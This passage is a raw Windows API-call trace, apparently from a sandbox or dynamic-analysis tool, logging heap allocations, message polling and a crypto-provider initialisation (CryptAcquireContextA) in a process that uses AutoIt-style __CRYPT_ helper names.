RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0222.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0222.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.358] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0222.358] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0222.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0222.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0222.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0222.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.359] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0222.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.361] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0222.361] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.361] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0222.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0222.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0222.362] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.362] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.362] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.363] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.363] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.363] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.363] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.363] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0222.363] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.363] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0222.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0222.363] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0222.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.363] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.364] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0222.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0222.364] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0222.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0222.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0222.365] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 